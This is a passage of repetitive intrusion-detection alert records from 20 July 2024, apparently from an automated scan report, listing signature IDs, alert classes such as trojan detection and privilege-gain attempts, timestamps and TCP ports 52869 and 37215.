                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.955474
                      SID:2025132
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:35398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2829579
                      Source Port:38336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2027339
                      Source Port:48610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.312606
                      SID:2025132
                      Source Port:37218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2027339
                      Source Port:56982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.167111
                      SID:2027339
                      Source Port:37666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.511508
                      SID:2831300
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2027339
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.552344
                      SID:2829579
                      Source Port:48396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.865744
                      SID:2027339
                      Source Port:44028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.102253
                      SID:2025132
                      Source Port:50806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.773969
                      SID:2831300
                      Source Port:47952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:26.028529
                      SID:2025132
                      Source Port:42320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.986039
                      SID:2831300
                      Source Port:58534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2027339
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.164789
                      SID:2831300
                      Source Port:45522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.156296
                      SID:2027339
                      Source Port:36610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.291604
                      SID:2025132
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:11.472742
                      SID:2835222
                      Source Port:46834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.170112
                      SID:2027339
                      Source Port:37906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2027339
                      Source Port:57112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2835222
                      Source Port:50328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.091811
                      SID:2025132
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.651872
                      SID:2831300
                      Source Port:45112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:58972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2027339
                      Source Port:42732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.219202
                      SID:2025132
                      Source Port:35916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2831300
                      Source Port:57810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.472705
                      SID:2831300
                      Source Port:33694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.602644
                      SID:2027339
                      Source Port:32994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:43734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.107636
                      SID:2025132
                      Source Port:37462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.913378
                      SID:2027339
                      Source Port:59100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2025132
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2831300
                      Source Port:49252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2829579
                      Source Port:54002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.635185
                      SID:2025132
                      Source Port:43246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2025132
                      Source Port:40398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.725488
                      SID:2027339
                      Source Port:58874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.543985
                      SID:2025132
                      Source Port:55796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:45.931745
                      SID:2025132
                      Source Port:51346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2027339
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.706531
                      SID:2025132
                      Source Port:36292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.198584
                      SID:2027339
                      Source Port:37630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.335445
                      SID:2027339
                      Source Port:45680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.714084
                      SID:2027339
                      Source Port:54992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.422288
                      SID:2831300
                      Source Port:36510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2027339
                      Source Port:51292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2025132
                      Source Port:36340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.517434
                      SID:2025132
                      Source Port:54072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:40616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2831300
                      Source Port:60074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.529818
                      SID:2027339
                      Source Port:53876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.185047
                      SID:2025132
                      Source Port:44486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2831300
                      Source Port:49108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.253106
                      SID:2025132
                      Source Port:49980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2831300
                      Source Port:56790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.581424
                      SID:2027339
                      Source Port:35398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2831300
                      Source Port:38746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.014485
                      SID:2831300
                      Source Port:56328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.387821
                      SID:2027339
                      Source Port:41162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2027339
                      Source Port:46778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2835222
                      Source Port:38644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2831300
                      Source Port:35794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.018252
                      SID:2025132
                      Source Port:49168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2027339
                      Source Port:41688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.315997
                      SID:2829579
                      Source Port:60908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:38500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2027339
                      Source Port:50066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.218209
                      SID:2025132
                      Source Port:56434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.373413
                      SID:2025132
                      Source Port:56546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.427147
                      SID:2835222
                      Source Port:54976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:36374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2829579
                      Source Port:44944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2027339
                      Source Port:41334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2829579
                      Source Port:43320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.508899
                      SID:2027339
                      Source Port:50718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.249838
                      SID:2027339
                      Source Port:40838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.293090
                      SID:2027339
                      Source Port:48200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2025132
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2025132
                      Source Port:53416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.860933
                      SID:2027339
                      Source Port:55766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.394050
                      SID:2025132
                      Source Port:44772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.829267
                      SID:2027339
                      Source Port:59078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2025132
                      Source Port:52144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2027339
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2027339
                      Source Port:46348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.535181
                      SID:2027339
                      Source Port:43316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2831300
                      Source Port:33018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.827044
                      SID:2027339
                      Source Port:48506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2027339
                      Source Port:60848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:44190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2829579
                      Source Port:43154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2027339
                      Source Port:56026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.439915
                      SID:2027339
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2027339
                      Source Port:47318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.023949
                      SID:2027339
                      Source Port:44036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.888787
                      SID:2025132
                      Source Port:50530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2829579
                      Source Port:54586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.366780
                      SID:2027339
                      Source Port:37398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.953100
                      SID:2027339
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.716020
                      SID:2831300
                      Source Port:33994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.538181
                      SID:2027339
                      Source Port:39512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:49132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2829579
                      Source Port:53888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2027339
                      Source Port:51086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.823353
                      SID:2025132
                      Source Port:55312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.088978
                      SID:2025132
                      Source Port:40046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:45.997240
                      SID:2027339
                      Source Port:35166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.442578
                      SID:2027339
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2831300
                      Source Port:58722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2831300
                      Source Port:57884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2027339
                      Source Port:36768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2829579
                      Source Port:54380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2829579
                      Source Port:35850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.535181
                      SID:2027339
                      Source Port:50338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.922651
                      SID:2025132
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:36520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.604858
                      SID:2025132
                      Source Port:55672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.251571
                      SID:2027339
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.552344
                      SID:2835222
                      Source Port:36374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.482858
                      SID:2831300
                      Source Port:56684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.734892
                      SID:2025132
                      Source Port:53532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2831300
                      Source Port:43930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.544318
                      SID:2831300
                      Source Port:35636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.470172
                      SID:2025132
                      Source Port:47588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.217231
                      SID:2025132
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.259708
                      SID:2025132
                      Source Port:55214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2025132
                      Source Port:50508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:54782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:51404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.345531
                      SID:2027339
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2027339
                      Source Port:42764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:39738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2831300
                      Source Port:37998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2027339
                      Source Port:49620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:56364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.736535
                      SID:2027339
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.585302
                      SID:2027339
                      Source Port:44996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.296284
                      SID:2025132
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.685237
                      SID:2025132
                      Source Port:48922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:48136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.570652
                      SID:2027339
                      Source Port:40406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.464582
                      SID:2027339
                      Source Port:44744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542288
                      SID:2027339
                      Source Port:35832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.280739
                      SID:2027339
                      Source Port:49716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2829579
                      Source Port:48230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2835222
                      Source Port:35726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2027339
                      Source Port:40680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:54626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.714969
                      SID:2025132
                      Source Port:59472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.204856
                      SID:2027339
                      Source Port:34662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2829579
                      Source Port:52034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2025132
                      Source Port:35584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:43764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2829579
                      Source Port:41276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.226653
                      SID:2027339
                      Source Port:49798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.369794
                      SID:2027339
                      Source Port:60136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2027339
                      Source Port:53740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.317926
                      SID:2025132
                      Source Port:38524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.999855
                      SID:2027339
                      Source Port:47084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.676865
                      SID:2027339
                      Source Port:36380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.175472
                      SID:2027339
                      Source Port:34104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2027339
                      Source Port:56188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.634433
                      SID:2025132
                      Source Port:51218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:45300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2027339
                      Source Port:57402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2025132
                      Source Port:60012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2829579
                      Source Port:39904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.143972
                      SID:2025132
                      Source Port:33856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2027339
                      Source Port:60862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2831300
                      Source Port:57792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.273333
                      SID:2027339
                      Source Port:40060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.216294
                      SID:2027339
                      Source Port:36980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:37.456862
                      SID:2027339
                      Source Port:39818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2025132
                      Source Port:36014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.236923
                      SID:2025132
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2027339
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
